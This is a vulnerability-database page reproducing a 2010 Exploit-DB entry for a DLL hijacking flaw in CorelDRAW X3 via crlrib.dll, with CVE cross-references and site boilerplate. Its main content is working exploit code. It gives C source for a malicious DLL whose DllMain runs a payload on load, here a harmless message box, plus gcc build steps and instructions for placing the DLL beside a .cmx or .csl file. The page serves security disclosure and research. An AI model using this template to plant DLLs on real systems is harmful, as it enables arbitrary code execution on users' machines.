Lucene search
+L

CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

CorelDRAW X3 13.0.0.576 DLL Hijacking Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2014-8393
29 Aug 201701:35
attackerkb
circl
Circl
CVE-2010-5240
25 Aug 201000:00
circl
circl
Circl
CVE-2014-8393
25 Aug 201000:00
circl
cnvd
CNVD
Arbitrary Code Execution Vulnerability in Multiple Corel Product 'wintab32.dll' DLL Loads
14 Jan 201500:00
cnvd
coresecurity
Core Security
Corel Software DLL Hijacking
12 Jan 201500:00
coresecurity
checkpoint_advisories
Check Point Advisories
Corel Multiple Products Multiple Insecure Library Loading (CVE-2014-8393)
2 Mar 201500:00
checkpoint_advisories
cve
CVE
CVE-2010-5240
7 Sep 201210:00
cve
cve
CVE
CVE-2014-8393
28 Aug 201720:00
cve
cvelist
Cvelist
CVE-2010-5240
7 Sep 201210:00
cvelist
cvelist
Cvelist
CVE-2014-8393
28 Aug 201720:00
cvelist
Rows per page
/*

 CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

 Vendor: Corel Corporation
 Product Web Page: http://www.corel.com
 Affected Version: X3 v13.0.0.576

 Summary: Graphic design software for striking visual communication.

 Desc: CorelDRAW X3 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extensions are .cmx and .csl thru crlrib.dll library.

 ----
 gcc -shared -o crlrib.dll coreldrw.c

 Compile and rename to crlrib.dll, create a file test.cmx or test.csl and
 put both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Aug 2010 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.9
CVSS 37.8
EPSS0.08342
32